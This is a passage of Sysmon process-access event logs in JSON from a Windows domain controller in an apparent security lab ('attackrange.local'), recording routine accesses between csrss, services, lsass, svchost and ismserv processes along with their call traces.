{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1186,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.875\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010BFBC0200}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.875","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010BFBC0200}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1187,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.879\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2536\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010BFBC0200}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.879","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"2536","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010BFBC0200}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1188,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.887\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.887","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1189,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.887\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.887","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1190,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.887\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.887","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1191,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.887\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.887","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1192,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.887\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.887","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1193,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.887\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.887","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1194,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.887\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|